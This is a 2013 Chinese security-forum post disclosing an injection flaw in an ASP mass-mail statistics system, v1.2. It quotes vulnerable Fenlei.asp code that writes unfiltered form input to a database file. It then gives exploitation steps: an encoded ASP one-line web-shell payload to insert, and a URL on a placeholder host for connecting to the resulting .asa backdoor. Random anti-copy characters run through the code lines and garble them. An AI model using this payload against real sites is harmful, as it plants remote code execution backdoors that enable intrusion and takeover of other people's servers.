找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2004|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp - X# D9 D) i, W* P, N  j
9 q, {: k! n2 U
IF Request.QueryString("Action")="del" Then 1 b1 Z$ g. K# ~% U, |( i4 v
ID=Request.QueryString("ID") # L$ C1 \" s4 ?, [. v" f* }5 m
IF Countss ("tui","Fenlei",ID )<>0 then 4 d9 R% n. ~6 R9 W! Z
'略
8 ~6 n3 p  v7 H- t8 DIF Request.QueryString("Action")="Add" Then
; S- W5 A" J4 O, c( P2 j  s4 C+ U( kTname=Request.Form("Typename")
- G6 [7 _* ^4 DSet Rs=Server.CreateObject("adodb.Recordset")
- x* Z0 A4 K3 Q1 J' l. JSql="Select * From Fenlei Order by id Desc "
1 w) Y5 F- B5 A3 W- B$ G4 o8 BRs.Open Sql,Conn,1,3
" A& [& h7 F8 @- Z9 aRs.Addnew
' I, P2 \: d- S" u; Q4 T: [Rs("Typename")=Tname ; j: m" G) l4 a+ U
'略 # B* M  y/ j2 \2 _& Y
Set Rs=Server.CreateObject("adodb.Recordset") ! F) W) S* R1 {/ q* E" w* Q
Sql="Select * From Fenlei Order by id Desc " 8 R1 K+ q8 ?' b( I
Rs.Open Sql,Conn,1,1 0 P) M5 @2 A" {* c
'略
9 s+ p. G7 v; `; P: p* R%>
# ]. G, @) E: d. a
) _9 B# {( B5 A& L: T# ]
/ d. @$ v( p1 l( N7 ?! ~
/ B, i  K( S. K" ]5 Q没有过滤,直接写入数据库。2 {8 k0 F" i& a* p( }

  Q: g4 |) f0 i0 ~! d利用方法:
3 h: K1 b; g5 D& Z* j0 U
+ S- A( o5 f) U* M插入:┼攠數畣整爠煥敵瑳∨≡┩>2 n# ]) r! t+ C: `  p- C% ^
, I8 e0 |- D1 I
5 z' q8 I2 \* H8 W
连接: http://www.xxx.com/###tongbaner.asa " E, w* ?0 }" j  ?
'默认安装文件:
) S& m" D; `. z, T'install.asp
: P  N, [5 h/ Q5 O) ]1 E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表